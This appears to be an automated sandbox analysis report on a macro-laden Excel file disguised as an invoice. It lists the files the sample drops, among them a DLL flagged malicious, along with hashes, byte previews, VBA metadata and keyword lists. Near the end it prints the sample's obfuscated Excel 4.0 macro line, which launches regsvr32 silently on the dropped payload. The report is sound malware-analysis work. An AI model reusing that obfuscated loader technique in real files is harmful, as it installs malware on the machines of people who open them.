Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):241332
Entropy (8bit):4.206800191309377
Encrypted:false
SSDEEP:1536:cGBLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cUNNSk8DtKBrpb2vxrOpprf/nVq
MD5:B5792839FFCDE087027D5A547980D113
SHA1:123E5064754F793DD092351716FE63ADC710C850
SHA-256:9695E46F2FD6AA383F55D5775646FEC330F16D4F0F9A3EC5DE8DB7E5F5922DAF
SHA-512:006AFBF1F6F901CEC158587822079D3F63B91FF9610F8B085694197EA649CA4C03AE60C2B0E039BB0DC6BFF6F2BB043755FB608F76FFE2ED9048ACC0CB001BEF
Malicious:false
Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
C:\Users\user\AppData\Local\Temp\Tar8642.tmp
Process:C:\Windows\SysWOW64\regsvr32.exe
File Type:data
Category:modified
Size (bytes):152533
Entropy (8bit):6.31602258454967
Encrypted:false
SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:D0682A3C344DFC62FB18D5A539F81F61
SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:false
Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
C:\Users\user\AppData\Local\Temp\WER58FA.tmp.WERInternalMetadata.xml
Process:C:\Windows\System32\DWWIN.EXE
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):3110
Entropy (8bit):3.680066132157358
Encrypted:false
SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3Yq3:Wl7LBNuhhgG45nv5J
MD5:926C1C387200B707E1FCA44038B7D6A0
SHA1:D9947998A737EDA6E87F2E6B2E6F3BD8211EE50E
SHA-256:5D181418FAD2CE41571753B94787EB1713C90BE6614A0F23F0ED4591CB22AB4C
SHA-512:236B28D83651EE6761AA9E3B8E3202C978AE3A3CC0EBBCE78972CFC445E60FE62FC78FB55E9DFBDE664F0D223A030FDAD9BD0AC5F8B4502BA18E1F1FF0AF3264
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
C:\Users\user\AppData\Local\Temp\cjrumqtd.dll
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):318976
Entropy (8bit):7.120104121741336
Encrypted:false
SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5:F317BDF94E5306AC0B02EDE9A263E36C
SHA1:073D7B5C5896A2974C454A9BC21B097C19E8AFB3
SHA-256:D5CF6F2148848F36D4A55BBC791372189EDFFB6326D8A0BB9B8743FD25BF0C8F
SHA-512:A26EDB19B9D7FDA69DB767B20A08DD769F760115CC668494B18ACED009FE1B9D4DF0D5A2D0B94F1B13D808E461A4B7C19527EA3D6C61C9B5D17DF5263E78193F
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar4A6F.xar
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):52958
                                                                                                                                Entropy (8bit):7.831640658188131
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:zYYha9orgFvRE5EG4IGWc3VsV9oyQkiY+K0/uH8n9QjU205LEd29WNJ4+TQtBv:HHgc5EGaKYI+/28nv5LkJ4+TQjv
                                                                                                                                MD5:77A248282F5733A3BFFB8AC0D18926E3
                                                                                                                                SHA1:6259E77DA9AEDFB97D12193327E950C0233315CB
                                                                                                                                SHA-256:2DDC67B6EABE13FDE5BED31948BB5DEE767F245BC712EB6AFBBB77D2464BF996
                                                                                                                                SHA-512:0C611CE78A6B90B0EDEEC688866773EA1A7398AAC6F92D9A72EF4490931D68F674CDC52B7C9ED12B244CA7D94F8C72D7DEA38FCD185E242FE90B824B343D5E47
                                                                                                                                Malicious:false
                                                                                                                                Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 03:47:45 2021, atime=Tue Jan 12 03:47:45 2021, length=16384, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):867
                                                                                                                                Entropy (8bit):4.497162942804637
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:85Q0SLgXg/XAlCPCHaX7B8NB/mBxX+Wnicvb6ObDtZ3YilMMEpxRljKicTdJP9TK:85Lk/XTr6NyxYeGCDv3qorNru/
                                                                                                                                MD5:F5D305A244F726C29F5B0AA0363008C0
                                                                                                                                SHA1:FCB62734ACE6630FA70C20CEA6E7A559093020C3
                                                                                                                                SHA-256:FB8A08911F91CBEBEC3FBB787A270C93C5262533CBB44DD803EF4DBD3E540C4B
                                                                                                                                SHA-512:75EDAF7E5DBBEAA6E5F74B8F23E8BBCF6AECBACE995E9C329C699D1E1D5A4734F6F94069961DB5CC6F649275847320DA13602A5996C48B7FE29DB167784B4A26
                                                                                                                                Malicious:false
                                                                                                                                Preview: L..................F...........7G...f.......f.......@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,R.%..Desktop.d......QK.X,R.%*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV8073565781-20210111319595.LNK
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:10 2020, mtime=Tue Jan 12 03:47:45 2021, atime=Tue Jan 12 03:47:54 2021, length=58711, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2218
                                                                                                                                Entropy (8bit):4.510813852899258
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8KFk/XTr6NGJbGvRGeG0o7cDv3qodM7dD2KFk/XTr6NGJbGvRGeG0o7cDv3qodMj:8j/XT+NGJGk/PoQh2j/XT+NGJGk/PoQ/
                                                                                                                                MD5:5DA2F89305C33EC4BF45936B360AD48A
                                                                                                                                SHA1:D24D4AA18A2EF2C0D167AA5C81DD9D1369A86FAC
                                                                                                                                SHA-256:D13EC064B739A61E4BEDE305229FB70AB7882D897FFCB91C676521A6D0534E7A
                                                                                                                                SHA-512:DEF66068FFA93A35E1A8D5B1AE2A95AA6BA362219BC1496C787C9F9DC9B82A2C06BCFAB4CAB648D786EE40C8B2DFEB250826E88405A39F510C612C68E6CB7B1F
                                                                                                                                Malicious:false
                                                                                                                                Preview: L..................F.... ... .]..{...f..............W............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....,R.% .INV807~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.8.0.7.3.5.6.5.7.8.1.-.2.0.2.1.0.1.1.1.3.1.9.5.9.5...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\INV8073565781-20210111319595.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.8.0.7.3.5.6.5.7.8.1.-.2.0.2.1.0.1.1.1.3.1.9.5.9.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):139
                                                                                                                                Entropy (8bit):4.527730544910855
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:oyBVomxWnnXSTv9UVGWUhr6YC0XSTv9UVGWUhr6YCmxWnnXSTv9UVGWUhr6YCv:djUnCXZoXZ6nCXZs
                                                                                                                                MD5:C19D952CED43635AFEA47BC110F72B70
                                                                                                                                SHA1:D17FF716911242D061F98EBDAE85585A14ADF8C2
                                                                                                                                SHA-256:3FA3B693E9BE6399C48BC71B3662A4F08DC649C73A9CFB09CBC360B185A747FB
                                                                                                                                SHA-512:5D28D2D1562B0A783AB62922B581F3967E1081A84211FF63B11B45BFD7C7FEDD8363DA2C30666D3712402DA2028D6C3740F9A9B4334609E080D666BF1798221F
                                                                                                                                Malicious:false
                                                                                                                                Preview: Desktop.LNK=0..[misc]..INV8073565781-20210111319595.LNK=0..INV8073565781-20210111319595.LNK=0..[misc]..INV8073565781-20210111319595.LNK=0..
                                                                                                                                C:\Users\user\Desktop\3DEE0000
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):58711
                                                                                                                                Entropy (8bit):7.859300767664731
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:hq8RzggbLmCf6646CIKSqtkTT61OVRYA8NZsLNFqo+Vt:hD1rmCM2VAOVRYL+9Q
                                                                                                                                MD5:3E7D81D1E78B3140F1149F1E2CAA7617
                                                                                                                                SHA1:9B7F1DE5831BE9B477FFF8256DB9E759A5C38EB0
                                                                                                                                SHA-256:7AA7EE516B89FDD183ED2E0A6B41630546121AC7C8C97F4B8A78BDD943BEAD7A
                                                                                                                                SHA-512:ABC41A47BA1B702C0F59CEAB3556BC7CD20ED8676DB441842ABB5CB9D7B66E00E491EC39D0AC000B841B5D6F05DDA15EC2F66A60758F4837A03068CE4DB45A12
                                                                                                                                Malicious:false
                                                                                                                                Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                C:\Users\user\Desktop\~$INV8073565781-20210111319595.xlsm
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):330
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                Malicious:true
                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                Entropy (8bit):7.77272893585129
                                                                                                                                TrID:
                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                File name:INV8073565781-20210111319595.xlsm
                                                                                                                                File size:42039
                                                                                                                                MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                                                                                SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                                                                                SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                                                                                SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                                                                                SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                                                                                File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                Static OLE Info

                                                                                                                                General

                                                                                                                                Document Type:OpenXML
                                                                                                                                Number of OLE Files:2

                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/338240/sample/INV8073565781-20210111319595.xlsm"

                                                                                                                                Indicators

                                                                                                                                Has Summary Info:False
                                                                                                                                Application Name:unknown
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:
                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                Contains Visio Document Stream:
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:True

                                                                                                                                Summary

                                                                                                                                Author:
                                                                                                                                Last Saved By:
                                                                                                                                Create Time:2020-12-07T14:38:21Z
                                                                                                                                Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0

                                                                                                                                Document Summary

                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:16.0300

                                                                                                                                Streams with VBA

                                                                                                                                VBA File Name: Module1.bas, Stream Size: 3215
                                                                                                                                General
                                                                                                                                Stream Path:VBA/Module1
                                                                                                                                VBA File Name:Module1.bas
                                                                                                                                Stream Size:3215
                                                                                                                                Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                Integer:
                                                                                                                                bycilke()
                                                                                                                                VB_Name
                                                                                                                                MiV(sem.value)
                                                                                                                                homepodd()
                                                                                                                                homepodd
                                                                                                                                Error
                                                                                                                                Integer)
                                                                                                                                bycilke
                                                                                                                                Function
                                                                                                                                ol).Name
                                                                                                                                "!"):
                                                                                                                                String
                                                                                                                                "ab":
                                                                                                                                Split(govs,
                                                                                                                                Randomize:
                                                                                                                                yellowsto(yel
                                                                                                                                Next:
                                                                                                                                ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                                yellowsto(Oa))))
                                                                                                                                Integer
                                                                                                                                yellowsto
                                                                                                                                ol).value
                                                                                                                                nimo(Int((UBound(nimo)
                                                                                                                                Replace(Vo,
                                                                                                                                Chr(sem.Row)
                                                                                                                                Sheets(ol).Cells(homepodd,
                                                                                                                                "ab"))
                                                                                                                                Split(kij(ol),
                                                                                                                                yellowsto(homepodd))
                                                                                                                                Rnd))
                                                                                                                                (Run(""
                                                                                                                                "moreP_"
                                                                                                                                Variant)
                                                                                                                                Attribute
                                                                                                                                Resume
                                                                                                                                pagesREviewsd(Optional
                                                                                                                                ecimovert(nimo
                                                                                                                                ecimovert
                                                                                                                                MsgBox
                                                                                                                                VBA Code
                                                                                                                                VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                                                General
                                                                                                                                Stream Path:VBA/Sheet1
                                                                                                                                VBA File Name:Sheet1.cls
                                                                                                                                Stream Size:1639

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                Index
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                Application.OnTime
                                                                                                                                VB_Exposed
                                                                                                                                Long)
                                                                                                                                ResizePagess()
                                                                                                                                VB_Customizable
                                                                                                                                "REviewsd"
                                                                                                                                VB_Control
                                                                                                                                MultiPage"
                                                                                                                                VB_TemplateDerived
                                                                                                                                MSForms,
                                                                                                                                False
                                                                                                                                Attribute
                                                                                                                                Private
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                ResizePagess
                                                                                                                                "pages"
                                                                                                                                VBA Code
                                                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                                General
                                                                                                                                Stream Path:VBA/ThisWorkbook
                                                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                                                Stream Size:999

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                False
                                                                                                                                VB_Exposed
                                                                                                                                Attribute
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                "ThisWorkbook"
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                VB_Customizable
                                                                                                                                VB_TemplateDerived
                                                                                                                                VBA Code

                                                                                                                                Streams

                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                                General
                                                                                                                                Stream Path:PROJECT
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Stream Size:550
                                                                                                                                Entropy:5.28107922141
                                                                                                                                Base64 Encoded:True
                                                                                                                                 Data ASCII:
                                                                                                                                 ID="{4934EDC8-1B93-45BC-B690-DBB29D5C1473}"
                                                                                                                                 Document=ThisWorkbook/&H00000000
                                                                                                                                 Document=Sheet1/&H00000000
                                                                                                                                 Module=Module1
                                                                                                                                 Name="VBAProject"
                                                                                                                                 HelpContextID="0"
                                                                                                                                 VersionCompatible32="393222000"
                                                                                                                                 CMG="EEEC1D31E5F1D7F5D7F5D7F5D7F5"
                                                                                                                                 DPB="DCDE2F3FF32CF42CF42C"
                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                General
                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                File Type:data
                                                                                                                                Stream Size:86
                                                                                                                                Entropy:3.24455457963
                                                                                                                                Base64 Encoded:False
                                                                                                                                 Data ASCII:ThisWorkbook (ANSI and UTF-16), Sheet1 (ANSI and UTF-16), Module1 (ANSI and UTF-16)
                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                                                General
                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                File Type:data
                                                                                                                                Stream Size:3574
                                                                                                                                Entropy:4.45079869926
                                                                                                                                Base64 Encoded:False
                                                                                                                                 Data ASCII (UTF-16 decoded, non-printable header bytes omitted):*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.
                                                                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_0
                                                                                                                                File Type:data
                                                                                                                                Stream Size:2060
                                                                                                                                Entropy:3.45011283232
                                                                                                                                Base64 Encoded:False
                                                                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_1
                                                                                                                                File Type:data
                                                                                                                                Stream Size:187
                                                                                                                                Entropy:1.91493173134
                                                                                                                                Base64 Encoded:False
                                                                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_2
                                                                                                                                File Type:data
                                                                                                                                Stream Size:363
                                                                                                                                Entropy:2.21122978445
                                                                                                                                Base64 Encoded:False
                                                                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                                General
                                                                                                                                Stream Path:VBA/__SRP_3
                                                                                                                                File Type:data
                                                                                                                                Stream Size:398
                                                                                                                                Entropy:2.07709195049
                                                                                                                                Base64 Encoded:False
                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                                                General
                                                                                                                                Stream Path:VBA/dir
                                                                                                                                File Type:data
                                                                                                                                Stream Size:820
                                                                                                                                Entropy:6.49145935167
                                                                                                                                Base64 Encoded:True

                                                                                                                                Macro 4.0 Code

                                                                                                                                 CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

